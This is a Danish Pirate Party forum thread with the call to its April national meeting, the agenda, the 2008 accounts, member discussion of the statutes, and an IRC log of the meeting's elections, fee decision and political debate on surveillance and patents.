You are here

Indkaldelse til Landsmøde

12 posts / 0 new
Last post
Ole Husgaard
Indkaldelse til Landsmøde

Lørdag den 25. april kl. 14:00 holder vi landsmøde. Alle medlemmer har adgang. Medlemmer, som er meldt ind og har betalt kontingent senest den 25. marts, har stemmeret.

Landsmødet foregår samtidigt på nettet (vores IRC kanal) og AFK på følgende adresse: Korsgade 2, 5610 Assens.

Formel indkaldelse per mail med dagsorden forventes ske fredag den 10. april.

Forslag til punkter på dagsordenen, vedtægtsændringer og lignende kan sendes til mig på pirat[snabel-a]sparre.dk, eller fremsættes i denne forumtråd.

Erik Ernst
Erik Ernst's picture
Perfekt.

Er optaget i københavn hele d. 24 men vil gøre hvad jeg kan for at dukke op, hvis ikke i kød og blod, så med garanti på IRC.

Ole Husgaard
Dagsorden for landsmødet

1. Valg af dirigent.

2. Godkendelse af indkaldelse til landsmødet og de praktiske arrangementer omkring elektronisk afholdelse af landsmødet.

3. Formandens beretning.

4. Forelæggelse af den reviderede årsrapport.

5. Fastsættelse af kontingent.

6. Valg af formand.

7. Valg af næstformand.

8. Valg af kasserer.

9. Valg af øvrige bestyrelsesmedlemmer.

10. Valg af revisor.

11. Drøftelse af vedtægtsændringer.

12. Vedtagelse af principprogram.

13. Politisk debat.

14. Øvrigt.

Ad. 4. Årsrapporten er ikke revideret, da vi endnu ikke har en revisor. Årsregnskab vil blive publiceret på hjemmesiden inden landsmødet. Detaljeret bogføring med alle bilag vil ligge til gennemsyn og kontrol for alle medlemmer, som møder op til landsmødet i Korsgade 2. Ole Husgaard foreslår, såfremt ingen andre medlemmer protesterer, at vi sparer udgift til ekstern revisor og godkender regnskabet uden ekstern revision indtil vi har et medlem, som vil have denne post.

Ad. 5. Ole Husgaard foreslår, at kontingentet fastsættes til 0 kroner, således, at man dog ved udløb af kontingentperioden skal bekræfte fortsat medlemskab for det næste år. Baggrunden er, at (a) enkelte nye medlemmer er droppet ud p.g.a. bøvlet med at lave et bankoverførsel, (b) der er tale om et stort administrativt arbejde at holde øje med om kontingenterne betales, og (c) mindre end 4 pct. af partiets indtægter i 2008 kom fra kontingentindbetalinger (resten var donationer).

Ad. 6. Ole Husgaard genopstiller.

Ad. 7. Stefi Snorradóttir genopstiller

Ad. 8. Hvis ikke andre stiller op til denne post, vil Ole Husgaard påtage sig hvervet.

Ad. 9.. Thomas Karlsson genopstiller. Vi mangler stillere til de øvrige bestyrelsesposter.

Ad. 10. Vi mangler en der vil stille op til denne post.

Ad. 11. Der bør ikke træffes endelig beslutning om vedtægtsændringer på dette landsmøde, da sådanne bør foreslås og drøftes i god tid. Men når vi nu er samlede, er det et godt tidspunkt at drøfte dette på. Ole Husgaard foreslår, at vedtægterne ændres, så Ung Pirat (Piratpartiets ungdomsorganisation), hvis denne organisation stiftes ved vedtægter der kan godkendes af næste landsmøde, kan udpege et bestyrelsesmedlem til Piratpartiet.

Ad. 12. Ole Husgaard foreslår, at:
a) Den danske oversættelse af Principer 3.1 vedtages som nyt principprogram.
b) At bestyrelsen bemyndiges til at bearbejde den danske oversættelse af Principer 3.2, som Erik Ernst har lavet, og foreslå denne som nyt principprogram på partiets hjemmeside. Hvis mindre end tre medlemmer inden 14 dage protesterer mod bestyrelsens forslag til det nye principprogram, bemyndiges bestyrelsen til at vedtage dette som nyt principprogram.

anonghost
Årsregnskab for Piratpartiet 2008

Årsregnskabet for 2008 er forholdsvist enkelt, med kun 25 posteringer i regnskabsåret, som følger kalenderåret.

Den største udgift i 2008 var indkøb og opsætning af server på kr. 7728,63. Den største løbende udgift er den løbende hostingafgift, som varierer efter Euro-kursen, men som i øjeblikket er på omkring kr. 537 per måned.

Resultatopgørelse

Indtægter

Kontingent 590,00
Donationer 14500,00
Indtægter i alt 15090,00

Udgifter

Hosting 11711,42
Diverse 0,00
Udgifter i alt 11711,42
Årets resultat 3378,58

Balance

Aktiver

Kontant indestående 3378,58

Passiver

Egenkapital 3378,58
Ole Husgaard
Det er den 25. april

Husk, at det er lørdag den 25. april.

Bech
Vedtægtstridigt

Hej
Jeg vil lige sige at sætningen "Medlemmer, som er meldt ind og har betalt kontingent senest den 25. marts, har stemmeret." er stridigt med §4.
"Adgang til landsmødet har alle medlemmer, og alle medlemmer har taleret på landsmødet. Medlemmer har stemmeret på landsmødet, hvis de har været medlemmer i mindst 30 dage."

Bare lige så det er pointeret, personligt har jeg ikke noget problem med at alle nye medlemmer har stemme og taleret, men jeg syns det er problematisk at den officielle indkaldelse til landsmødet er vedtægtstridigt.
Derfor foreslår jeg at efter formalia, diskuteres ændring af vedtægter. Jeg foreslår samtidig at stykket i overnævnte stykke slettes, "hvis de har været medlemmer i mindst 30 dage." Så ordlyden af stykket bliver. "Adgang til landsmødet har alle medlemmer, og alle medlemmer har taleret på landsmødet. Medlemmer har stemmeret på landsmødet."

Hilsen
Bech

Ole Husgaard
Vedtægtsstridigt?

Hej Bech,

Jeg forstår ikke præcist hvorfor du synes denne sætning er i strid med vedtægterne?

Som du selv skriver, kræver vore vedtægter, at man har været medlem i 30 dage før landsmødet for at man har stemmeret. Samtidig fremgår det af §3, at "Som medlem anses alene personer der har betalt årskontingent inden for det seneste år". Da der betales kontingent for et år af gangen, og vi har eksisteret i mindre end et år, bliver resultatet jo, at man skal være meldt ind og have betalt kontingent senest den 25. marts for at have stemmeret.

Der er to årsager til, at vi har en regel om, at man skal have været medlem i 30 dage før man har stemmeret til landsmødet: For det første vil vi gerne undgå, at en masse melder sig ind umiddelbart før landsmødet, og stemmer inden de har sat sig ind i partiets kultur og arbejdsmetoder. For det andet vil vi gerne undgå det bøvl der kan blive, hvis man melder sig ind umiddelbart inden landsmødet, og vi ikke når at behandle indmeldelsen fordi vi har for travlt med at forberede landsmødet.

Punkt 11 i dagsordenen omhandler drøftelse af vedtægtsændringer. Her er du velkommen til at foreslå, at 30-dages reglen afskaffes. Personligt ville jeg dog ikke være glad for en sådan ændring, af ovenstående årsager.

Bech
Jeg undskylder mit indlæg,

Jeg undskylder mit indlæg, jeg har lige læst invitationen igen nogen gange, og er kommet frem til at jeg havde læst datoen forkert. Jeg fik det læst som om alle der havde betalt før i morgen, havde stemme og taleret.
Mit forslag om ændring af §4 trækkes tilbage, og jeg undskylder ulejligheden.

Bech

Ole Husgaard
Det er helt i orden

Det er vigtigt, at alle der mener reglerne ikke følges siger til. Så kan vi altid se på om der er tale om en misforståelse som her, eller om der er tale om et reelt problem vi skal rette op på.

Guss
Serveromkostninger?

Hej Ole,
Angående serveromkostninger, var i så ikke hosted gratis hos piratbyran?
Ellers vil de, eller nogen af de andre piratorganisationer sikkert ger stille det til rådighed.

Ole Husgaard
Vi hoster selv

Nej, vi har aldrig været hostet hos Piratbyrån. Vi har vores egen server, med ledig kapacitet til fremtidige initiativer, eller så vi hurtigt kan hoste et andet Piratparti, hvis nogen snupper deres server. (Det sidste er sket to gange for Piratpartiet i Tyskland efter at de afslørede dokumenter der viste at det tyske politi overtrådte loven, selvom ingen af de offentligt tilgængelige servere er blevet taget.)

Vi hoster lige nu også Piratpartiet i Holland, selvom deres server ikke er blevet snuppet. De var gået lidt i stå, og havde mistet dem de ellers var blevet hostet hos, og havde derfor brug for en ny server.

Ole Husgaard
Log fra landsmødet på IRC

Her er loggen fra landsmødet på IRC. Et referat fra landsmødet kommer senere i løbet af ugen.

(13:56:15) osh_DK1: Nu er vi snart klar
(13:56:31) osh_DK1: DR er her, vi kommer i nyhederne i aften
(13:56:53) *slackmac [/chatzilla@--E085FE67.pools.arcor-ip.net/] entered the room.*
(13:57:11) *slackmac_ [/chatzilla@--E085FE67.pools.arcor-ip.net/] entered the room.*
(13:57:54) slackmac: er det her landsmødet starter?
(13:58:02) osh_DK1: Det er det
(13:58:14) slackmac: ok.hvordan vil det foregå?
(13:58:20) slackmac: eller er det allerede begyndt
(13:58:25) osh_DK1: Vi bliver måske en smule forsinkede p.g..a. TV-interviews
(13:58:41) osh_DK1: JEg referer begge veje
(13:58:51) slackmac: Ha. hvem skal interviewes og til hvem?
(13:59:17) osh_DK1: Vi skal også lige have verificeret medlemmer med stemmeret - de må gerne sende mig en pm
(13:59:39) osh_DK1: Jeg er lige blevet interviewet, og en anden bliver interviewet nu
(13:59:59) rhoegh: fedt
(14:00:06) odenseaneren: hvad er en pm?
(14:00:18) lasg: privat message
(14:00:49) slackmac: er det tv2, dr1, eller nogle af internet medierne
(14:00:50) slackmac: ?
(14:02:00) Kludentwo: dr1
(14:02:03) Kludentwo: afaik
(14:02:13) slackmac: afaik?
(14:02:40) lasg: alle de forkortelser.. :)
(14:02:48) lasg: As far as I know
(14:03:06) osh_DK1: Det er DR1
(14:03:09) slackmac: tak
(14:03:22) osh_DK1: pm: Private Message
(14:04:47) osh_DK1: Medlemmer bør skrive /msg osh_DK1 hej
(14:07:44) *mode (+v odenseaneren) by osh_DK1*
(14:08:43) slackmac: hvad hvis man ikke er et betalende medlem?
(14:09:13) Kludentwo: så har du ikke stemmeret
(14:09:20) slackmac: ok
(14:09:35) Christian: Tror ikke man bliver talt som medlem før efter mødet. Der ophæver de vist kontigentet.
(14:10:03) rhoegh: hehe, jeg har lige betalt. :-)
(14:10:08) osh_DK1: medlemmer der har stemmeret får voice, som odenseaneren
(14:12:01) osh_DK1: Bag odenseanerens nick sidder tre medlemmer med stemmeret, som har stemmeret
(14:12:18) slackmac: cool
(14:15:14) *osh_DK1 has changed the topic to: Landsmøde: Medlemmer med stemmeret ska sige til for at få voice*
(14:16:18) slackmac: Hvad vil det sige at få voice?
(14:16:51) rhoegh: jeg tror at det er at man kan snakke over chatten
(14:17:41) slackmac_: ok
(14:22:00) lasg: Det kan alle lige nu. Men administratorerne kan slaa en option til, saa kun de med voice kan snakke.
(14:22:05) Christian: I nogle channels bruger man voice til at give folk ret til at snakke i chatten. Osh bruger den bare istedet til at vise hvem der har stemmeret :p
(14:22:20) lasg: mhm
(14:22:24) osh_DK1: Voice er en attribut man får som bruger i kanalen, som odenseaneren har
(14:23:03) osh_DK1: Så er vi vist klar til at at gå igang
(14:23:17) osh_DK1: punkt 1, valg af dirrigent
(14:23:28) osh_DK1: Stefy stiller op
(14:24:04) odenseaneren: ok fra os her
(14:24:04) osh_DK1: alle her kan tilslutte sig stefy som dirigent
(14:24:28) osh_DK1: Vi sidder i øvrigt 4 edlemmer her
(14:24:33) osh_DK1: medlemmer
(14:24:55) osh_DK1: Nogen der protesterer mod stefy som dirigent?
(14:25:24) osh_DK1: Så er Stefy valgt som dirigent
(14:25:52) osh_DK1: Punkt 2: Formandens beretning
(14:26:17) osh_DK1: Undskyld, det var punt 3
(14:27:23) osh_DK1: Punkt 2: Godkendelse af indkaldelse til landsmødet og de praktiske arrangementer omkring elektronisk afholdelse af landsmødet
(14:27:54) osh_DK1: Nogen der har indsigelser mod indaldelsen eller mødeformen her?
(14:28:46) rhoegh: nope, men n?ste gang kunne det v?re fedt med lyd og billed.
(14:28:47) *skurkan [/morten@--C9426D37.kd4nxx8.dynamic.dsl.tele.dk/] entered the room.*
(14:29:39) osh_DK1: rhoegs forslag er noteret
(14:30:56) osh_DK1: Punkt 3: 3. Formandens beretning.
(14:31:15) osh_DK1: Vi er oppe på 18 medemmer
(14:31:38) osh_DK1: Der har været meget interesse på det sdste, og det ør vi udnytte
(14:32:08) osh_DK1: Regnskab og lign er på hjemmesiden
(14:32:35) osh_DK1: Nogen spørsmål?
(14:34:11) skurkan: har i kontakt til piratgruppen.org ?
(14:34:15) osh_DK1: 4. Forelæggelse af den reviderede årsrapport.
(14:35:07) osh_DK1: Ja, vi har kontakt, og - synes jeg selv - et godt, men helt uformelt samarbejde - vi supplerer hinanden godt
(14:35:35) skurkan: hvordan kan det v?re der s? kun er 18 medlemmer ? der m? da v?re mange i det comminuty der vil st?tte det her projekt
(14:35:58) rhoegh: helt sikkert, de venter bare p? vi kontakte dem :-)
(14:37:02) rhoegh: men det er vel ogs? det vi skal til planl?gge i den n?re fremtid.
(14:37:05) osh_DK1: Vi har ikke gjort så meget for at hverve medlemmer endnu - de første skal helst brænde for politikken for at vi har en stabil kerne i partiet
(14:38:34) osh_DK1: Videre til punkt 4
(14:38:43) osh_DK1: Årsrapporten er ikke revideret, da vi endnu ikke har en revisor.
(14:39:35) osh_DK1: Regnskabet ligger er til gennemsyn med alle bilag, og ingen her ser nogen prblemer i det, selvom det ikke formelt er revideret
(14:39:53) osh_DK1: Åraregnskabet ligger også på hjemmesiden
(14:40:06) osh_DK1: Nogen spørsmål eller kommentarer
(14:41:13) osh_DK1: Vi bør finde en revisor i egen medlemskreds, så vi ikke skal betale tusindvis kr til ekstern revision
(14:41:37) osh_DK1: Denne revisor bør oggså revidere 2008-regnskabet, når vi finder ham
(14:43:39) rhoegh: skal det v?re en uddannet revisor eller er det tilstr?kkligt at finde en som er ikke er inhabil?
(14:43:54) osh_DK1: Erik Ernst mener at kunne overtale en revisor han kender til at revidere uden omkostninger for os
(14:44:16) rhoegh: en som bare skal godkende og underskrive det?
(14:44:27) osh_DK1: Det er tilstrækkeligt med en der ikke er inabil
(14:44:35) rhoegh: ok
(14:44:59) osh_DK1: Stefy siger at det bør være en med en vis erfaring , og her er jeg enig
(14:45:35) osh_DK1: Erik Ernst vil melde tilbage i næste uge når han har talt med den revisor han kender.
(14:46:38) osh_DK1: Skal vi gå videre eller er der mere med revisionen?
(14:48:01) osh_DK1: 5. Fastsættelse af kontingent
(14:49:21) odenseaneren: god ide at høre hvad Erik Ernst melder tilbage når han har talt med sin ven
(14:49:33) slackmac: B
(14:51:13) rhoegh: jeg syntes Oles forslag om neds?ttelse er en god ide.
(14:51:52) osh_DK1: Ja, jeg foreslår at det nedsættes til 0 kr, som beskrevet på hjemmesiden
(14:52:15) rhoegh: thumbs up fra min side :-)
(14:52:18) *skurkan left the room (quit: Quit: ).*
(14:52:26) osh_DK1: Der er enighed her AFK om at nedsætte kontingentet til 0 kr.
(14:52:50) osh_DK1: Hvad siger medlemmerne ved odenseaneren?
(14:56:06) odenseaneren: vi stemmer alle 3 for forslaget
(14:56:44) osh_DK1: Så er det enstemigt vedtaget
(14:57:49) osh_DK1: 6. Valg af formand.
(14:57:59) osh_DK1: Jeg stiller op
(14:58:13) osh_DK1: Er der andre, som stiller op?
(14:58:26) odenseaneren: ingen her
(14:59:03) odenseaneren: vi stemmer alle på Ole Husgaard
(14:59:11) osh_DK1: Så er det vist kun mig der er på valg
(14:59:58) osh_DK1: Så er jeg enstemmigt genvalgt
(15:00:10) osh_DK1: Tak for valget
(15:00:20) Christian: Tillykke!
(15:00:34) rhoegh: S? skal du gi' ?l :-)
(15:00:42) osh_DK1: 7. Valg af næstformand.
(15:00:43) odenseaneren: TILLYKKE herfra:)
(15:03:17) osh_DK1: Der foreslås her at der findes en mere engageret næstformand end Stefy
(15:03:28) osh_DK1: Erik Ernst stiller op
(15:04:14) osh_DK1: Stefy trækker sig fra valg til næstformandsposten
(15:05:13) osh_DK1: Alle her kan tilslutte sig valg af Erik Ernst som næstformand
(15:05:57) odenseaneren: vi kan tilslutte os valget af Erik Ernst
(15:06:29) osh_DK1: Erik Ernst er enstemmigt valgt
(15:06:51) osh_DK1: 8. Valg af kasserer.
(15:07:09) rhoegh: Tillykke med valget, og tak til stefy
(15:08:30) osh_DK1: Nogen her der vil stille op til valg som kasserer?
(15:10:05) rhoegh: hvis der ikke er andre, og det er n?dvendigt, kan jeg godt melde mig.
(15:10:58) osh_DK1: Der drøftes problematikken med at jeg både er kasserer og formand
(15:11:26) osh_DK1: Det betyder at jeg juridisk set tegner partiet ifølge vedtægterne
(15:11:58) odenseaneren: er det et problem?
(15:12:19) osh_DK1: Det der det ikke her
(15:12:47) odenseaneren: Så har vi ingen indvendinger
(15:13:47) rhoegh: jeg har hellere ikke.
(15:13:53) osh_DK1: Et andet probem er den ekstra arbejdsbyrde
(15:14:12) osh_DK1: Regnes heller ikke for et problem her endnu
(15:14:34) osh_DK1: Kasserer-byrden er også mindre når der ikke betales noget i kontingent
(15:15:40) odenseaneren: kan valget af kasserer så ikke være midlertidigt?
(15:17:57) osh_DK1: Vi mener ikke her, at vi kan tillade os at skifte kasserer uden at have et landsmøde - evt. ekstraordinært
(15:18:53) rhoegh: Kan bestyrelsen ikke bare f? uddelegeret ansvaret for det, frem til n?ste landsm?de?
(15:19:19) rhoegh: Det kan landsm?det vel godt beslutte.
(15:19:27) osh_DK1: Jeg vil mene at landsmødet skal spørges om valg af kasserer
(15:20:17) osh_DK1: Ellers skal vi nu vælge en suppleant til posten der kan overtage, men så har vi alerede en der vil være kasserer
(15:21:44) osh_DK1: Alle her stiller sig bag valget af mig som kasserer, hvis ingen andre stiller op
(15:22:14) osh_DK1: Hvad siger odenseaneren?
(15:22:25) rhoegh: Thumbs up herfra
(15:22:55) odenseaneren: ok herfra
(15:23:22) osh_DK1: Så er jeg enstemmigt valgt som kasserer
(15:23:39) odenseaneren: tillykke
(15:23:50) rhoegh: tillykke
(15:23:57) osh_DK1: tak
(15:24:00) osh_DK1: 9. Valg af øvrige bestyrelsesmedlemmer.
(15:24:25) rhoegh: her vil jeg gerne stille op
(15:25:10) odenseaneren: hvor mange er det?
(15:25:29) osh_DK1: Vi skal her ifølge vedtægerne have valgt tre øvrige bestyresesmedlemmer
(15:25:40) osh_DK1: Stefy til
(15:25:52) osh_DK1: Stefy stiller op
(15:26:05) osh_DK1: Thomas stiller op
(15:26:14) osh_DK1: Pernille stiller op
(15:26:25) osh_DK1: Andre som stiller op?
(15:28:08) odenseaneren: ser ikke sådan ud
(15:28:17) rhoegh: hehe, jeg kan ingengang stemme p? mig selv. :-)
(15:28:41) osh_DK1: Hvis ingen andre stiller op foreslår jeg at de tre stillere vælges
(15:29:04) odenseaneren: er der ikke 4 stillere?
(15:29:31) rhoegh: jeg kan godt tr?kke mig, s? vi kan slippe for at komme ud i en valgrunde
(15:29:55) osh_DK1: Vil du stille op, rhoegh, eller trækker du dig?
(15:30:18) osh_DK1: Vi har tre stillere, hvis rhoegh trækker sig
(15:30:33) rhoegh: jeg kan godt tr?kke mig
(15:31:06) rhoegh: jeg er sikker p? at der stor ?benhed omkring bestyrelsens arbejde, og at man bare kan deltage fra sidelinien?
(15:31:20) rhoegh: :-)
(15:31:50) osh_DK1: Netop, vi prøver at have en meget flad organisation
(15:31:56) rhoegh: cool
(15:32:21) osh_DK1: Bestyrelsen er en formalitet, men en vigtig formalitet
(15:32:51) osh_DK1: Alle her er enige om, at de tre stillere vælges
(15:33:06) odenseaneren: vi kan godt tilslutte os de øvrige 3 stillere hvis rhoegh trækker sig
(15:33:32) rhoegh: ok, herfra
(15:33:37) osh_DK1: rhoegh har trukket sig
(15:33:50) odenseaneren: så ok fra os
(15:34:01) osh_DK1: Så er Thomas, Stefy og Pernille enstemmigt valgt
(15:34:19) odenseaneren: TILLYKKE med valget herfra
(15:34:33) odenseaneren: :)
(15:34:41) rhoegh: tillykke :-)
(15:35:14) osh_DK1: 10. Valg af revisor.
(15:36:04) osh_DK1: Stefy henviser til drøftelsen under punkt 4
(15:36:29) osh_DK1: Har vi nogen der mener at kunne revidere?
(15:36:49) osh_DK1: Nogen der stiller op til posten som revisor?
(15:37:58) odenseaneren: blev vi ikke enige om, at Erik Ernst skulle kontakte et muligt emne?
(15:38:23) Christian: Synes også der var en underlig følelse af deja vue
(15:38:41) osh_DK1: Jo, men vi kan jo ikke vælge et muligt emne, når vedkommende ikke har accepteret at stille op og blive valgt
(15:39:38) osh_DK1: Jeg vil foreslå, at vi lader denne post stå åben, ligesom sidste år, men ellers søger efter en intern revisor
(15:40:38) odenseaneren: hvis det er en mulighed kan vi alle her tilslutte os denne løsning
(15:41:14) rhoegh: ok med mig
(15:41:44) osh_DK1: Deter så enstemmigt vedtaget at lade posten som revisor stå åben,men lede efter en intern revisor
(15:42:08) odenseaneren: fint
(15:42:45) osh_DK1: Jeg foreslår en kort pause
(15:43:07) osh_DK1: Lad os holde 5 minutter
(15:43:13) rhoegh: ok
(15:52:28) *Werge [/frederik@--2728683D.adsl.cybercity.dk/] entered the room.*
(15:53:03) *Werge is now known as frepir*
(15:53:23) *frepir left the room.*
(15:55:13) osh_DK1: Så er vi vist ved at være klar igen
(15:55:37) osh_DK1: 11. Drøftelse af vedtægtsændringer.
(15:55:55) odenseaneren: klar herfra
(15:56:27) osh_DK1: Vi bør kun drøfte ændringer, ikke vedtage dem nu, da de bør drøftes godt igennem , så vi har et klart og gennemtænkt forslag
(15:58:37) osh_DK1: Jeg har foreslået, at en eventuel ungdomsorganisation skal have mulighed for at udpege et medlem af bestyrelsen, som så ikke vælges af landsmødet, men af ungdomsorganisationen
(15:59:07) *louis [/louis@--88A4B20A.fullrate.dk/] entered the room.*
(15:59:38) osh_DK1: Naturligvis under forudsætning af, at landsmødet kan godkende undomsorganisationens vedtægter
(16:00:06) osh_DK1: De har lignende i Sverige
(16:00:19) odenseaneren: det lyder som en god ide, og den kan vi enstemmigt tilslutte os herfra
(16:00:46) osh_DK1: Det synes vi også her
(16:01:19) osh_DK1: Vi bør ikke ændre vedtægterne nu, men udarbejde forslag til vedtægtsændring
(16:01:21) Christian: God ide
(16:02:44) osh_DK1: Lad os tage vedtægtsændringer på forum, så vi kan få det godt drøftet igennem, og vedtaget på næste landsmøde
(16:03:37) odenseaneren: godkendt herfra
(16:04:07) osh_DK1: Det er så enstemmigt vedtaget
(16:04:16) osh_DK1: 12. Vedtagelse af principprogram
(16:06:48) osh_DK1: Jeg foreslår: Den danske oversættelse af Principer 3.1 vedtages som nyt principprogram.
(16:08:31) odenseaneren: Vi tilslutter os alle her
(16:09:29) osh_DK1: Det er enstemmigt vedtaget
(16:09:49) osh_DK1: Principprogrammet er nu officielt på dansk
(16:10:24) odenseaneren: Tillykke
(16:10:54) rhoegh: fedt, et stykke danmarkshistorie er blevet vedtaget.
(16:12:03) osh_DK1: Jeg foreslår desuden: At bestyrelsen bemyndiges til at bearbejde den danske oversættelse af Principer 3.2, som Erik Ernst har lavet, og foreslå denne som nyt principprogram på partiets hjemmeside. Hvis mindre end tre medlemmer inden 14 dage protesterer mod bestyrelsens forslag til det nye principprogram, bemyndiges bestyrelsen til at vedtage dette som nyt principprogram.
(16:13:18) osh_DK1: Årsagen er, at jeg helst ikke vil have ændret det uden at der er bred enighed blandt medlemmerne
(16:13:18) rhoegh: ok, herfra
(16:13:22) odenseaneren: godkendt fra os alle
(16:15:35) osh_DK1: Erik Ernst kender nogen der er rigtigt gode til sprog, som han vil prøve at få til at se på de sproglige formuleringer, selvom vi vil lade selve indholdet være uændret i forhold til svenske Principer 3.2
(16:16:20) osh_DK1: Alle her er enige om at give bestyrelsen denne bemyndigelse.
(16:16:43) odenseaneren: vi er også enige her
(16:16:49) osh_DK1: Jeg vil dog sige, at alle medlemmer er velkomne til at komme med input i denne process
(16:17:28) osh_DK1: Så er det enstemmigt vedtaget
(16:21:37) osh_DK1: Stefy skal lave mad, og vil gerne udnævne Erik Ernst som midlertidig ordstyrer
(16:22:25) osh_DK1: Alle her kan tilslutte sig Erik Ernst som midertidig ordstyrer
(16:22:36) odenseaneren: ok fra os
(16:23:06) osh_DK1: Så er det enstemmigt vedtaget at Erik Ernst er ordstyrer indtil Stefy har tid igen
(16:23:50) osh_DK1: Stefy deltager dog stadig i mødet, hun har bare ikke tid til at passe ordstyrerrollen
(16:24:53) osh_DK1: Punkt 13. Politisk debat.
(16:25:39) osh_DK1: Pernille synes der mangler politisk debat
(16:26:18) osh_DK1: Der er efter min mening heldigvis ved at komme godt gang i debatforummet
(16:26:52) osh_DK1: For eksempel er der en debat om forbud mod DRM lige nu
(16:27:58) Christian: Måske grundet i at der er for lidt medlemmer. Derudover er der måske for lidt værktøjer udover IRC (som ikke har en guide, hvilket den svenske piratgruppe har) og forummet. Hvis folk ser et aktivt forum er chancerne for tilslutning nok også større.
(16:29:27) osh_DK1: Stefy mener det er vigtigt at brede debatten ud over hvad der bare er om ophavsret på internettet
(16:29:56) osh_DK1: Også f.eks. patenter på medicin er vigtigt
(16:30:32) rhoegh: jeg har t?nkt over om det ikke er muligt at integrere diskussionerne, til ligende diskussioner bare p? andre foraer. Jeg har ikke s? meget teknisk kunnen, men kan man ikke lave det som en automatisk opdatering af blogs, m?ske en form for RSS-feed? Hvis vi gjorde det kunne vi v?re med at samle communitiene omkring diskusionerne.
(16:30:56) osh_DK1: Jeg mener selv, at specielt debatten om beskyttlsen af den personlige integritet er vigtig også
(16:31:40) rhoegh: Det kr?ver selvf?lgelig at man for identificeret de foraer, og f?r dem med p? samarbejdet.
(16:32:05) osh_DK1: Det er noget der engagerer folk i partiet, og holder dem fast i engagementet, hvor kopiering på internettet specielt er godt til at tiltrække folk
(16:33:28) odenseaneren: vi bor i en demokratisk retsstat, og jeg mener, at der bør bvære demokrati i vores retssystem. Som det er i dag, har politiet monopol på efterforskning.
(16:34:25) osh_DK1: Vi synes alle her, at rhoegh har en god ide her
(16:35:19) rhoegh: Vi kan starte med at oprette noget inde p? wikipedia.
(16:35:32) Christian: Har ærlig talt ikke ret meget forstand på patenter, men det er interessant emne og kunne sagtens være del af parti politiken. Handler ihvertfald om at man skal diskutere hvorvidt disse monopoler er nødvendige.
(16:39:25) *oj [/stefan_oj@--380981BB.u.parknet.dk/] entered the room.*
(16:40:34) osh_DK1: Vi mener det er et problem med politiets efterforskningsmonopol - forsvaret skal have bemyndigelse til at efterforske selv
(16:41:02) osh_DK1: Monopoler er efter min mening næsten altid et problem
(16:41:37) oj: hvad med forsvarets ?17 med FET bemyndielses til totaln ovwerv?gniung
(16:42:04) osh_DK1: Vi mangler at få opdateret siden om Piratpartiet i den danske wikipedia
(16:42:06) oj: hvis vi er i undtagelsestilstand
(16:42:35) osh_DK1: Den er forældet, og forklarer om det svenske piratparti
(16:43:34) osh_DK1: Christian: Ifølge principprogrammet ønsker vi patenter helt afskaffet
(16:43:35) *odenseaneren left the room (quit: Connection reset by peer).*
(16:43:56) oj: Forsvarsministeren kan ikke oplyses om vi er i undtgelsestilstand. og derfor er FET's bemyndigelses uvis...
(16:44:13) *odenseaneren [/mogens_lau@--3CDB5BFE.adsl.cybercity.dk/] entered the room.*
(16:44:28) odenseaneren: monopoler giver, som bekendt, magt. Og dette giver mulighed magtmisbrug. Nu mistænker jeg ikke politiet for at misbruge deres magt. Det vil jeg lade være op til den enkelte at vurdere. Men at vi er godt på vej til at udvikle os til en decideret politistat er der ingen tvivl om
(16:45:01) osh_DK1: Total overvågning er et stort problem
(16:45:26) Christian: Mht debatten handler det ikke snarere om der mangler et ordentlig fundament for diskussion. Hvis vi har medlemmer med den tekniske evne som kan forvandle hjemmesiden til et sted hvor man kan få nyheder om alt der vedrører vores politik ville der være meget mere information og vi kan give bud på konkrete emner istedet for at tage alt op på et fora.
(16:46:15) rhoegh: netop, christian.
(16:46:46) odenseaneren: Den magt politiet får ved hjælp af aflytninger og anden overvågning, giver dem i sidste ende, mulighed for at bestemme hvem der skal have magten i landet
(16:46:58) Christian: Ifølge princip programmer vil vi have patenter fuldstændig afskaffet - men snarere komme frem til alternativer og måder at nedbryde det nuværende forældrede system.
(16:47:26) osh_DK1: Hvis f.eks. ophavsretten som den ser ud nu skal kunne opretholdes i informationssamfundet skal vi have en politistat vi ikke ønsker, med total overvågning af al privat komunikation
(16:48:34) osh_DK1: Som oj siger om totalovervågning, er det et problem at vi ikke kan få at vide om vi er i en undtagelsestilstand og er totalovervågede.
(16:49:18) osh_DK1: Problemet er også om "undtagelsestilstand" misbruges af magthavere for at de bedre kan styre befolkningen
(16:50:09) odenseaneren: tænk jer et samfund hvor politiet ved alt om alle, de kan kompromittere hvem som helst, og derved skandalisere ethvert partimedlem i et hvilket som helst parti, og derved bestemme hvem de vil have til magten
(16:50:52) The-Bas: S?lvpapirshat p? nu!
(16:50:58) Christian: Hahah
(16:51:07) rhoegh: :-)
(16:51:07) osh_DK1: Det har odenseaneren helt ret i, og derfor et totalovervågning meget farligt for demokratiet
(16:55:49) rhoegh: problemet er at det er nogle principper der l?ber l?bsk. Copyright reglerne sammenkoblet med myndighedernes udvidet magtbef?jelser, kan medf?re kriminalisering og straf af store dele af befolkningen.
(16:56:12) Christian: Nu er der jo ingen grund til at lyde alt for paranoid, men ja retning som den nuværende regering er på har ofret meget retssikkerhed for at opnå en falsk tryghed.
(16:56:41) osh_DK1: I øjeblikket går det stært i den retning
(16:56:58) osh_DK1: I Frankrig vil man straffe folk uden dom
(16:57:58) Christian: Forstår heller ikke hvorfor Nicholas Sarkezy vil have den indført - kender ikke meget til fransk kultur eller politikken, men er det større emne dernede ? Skulle tro der var vigtigere ting på dagsordnen end fil-deling med den mændge af arbejdeløse de har.
(16:58:53) osh_DK1: Telekom pakken er meget vigtigt her
(16:59:11) odenseaneren: Ja men det er jo regeringen og medierne der har skabt frygten, først med rockerkrigen, som politiet sørgede for at kunne ske, hvilket Dan Lyngesagen beviste, derefter 2. generationsinvandrene, så ungdomshuset, så Christiania, og nu bandekrigen.
(16:59:40) osh_DK1: Der er skrevet om den på forum, og vi bør alle gøre vores for at påvirke politikerne i EU-parlamentet
(17:01:14) osh_DK1: Medierne skaber et billede som får folk til at blive bange så de tillader at deres rettigheder undergraves
(17:01:45) odenseaneren: Hvordan harmonerer monopol med demokrati?
(17:02:24) oj: perfekt i et diktatorisk demokrati
(17:04:16) Christian: Så er det vel vores opgave at prøve at ændre dagordnen eller ihvertfald komme med udtaleser om at hver eneste sikkerhed som vi gladeligt tager imod på bekostning af privatlivet og retssikkerheden ikke er det værd. Man skal ikke bevise folk om at tryghed og sikkerhed er forkert men at prisen er for høj. Jeg vil ikke kunne aflyttes eller få min computer hacket på baggrund af bandekrigene ell
(17:04:18) Christian: er...
(17:04:20) Christian: ...terrorlovgivningen.
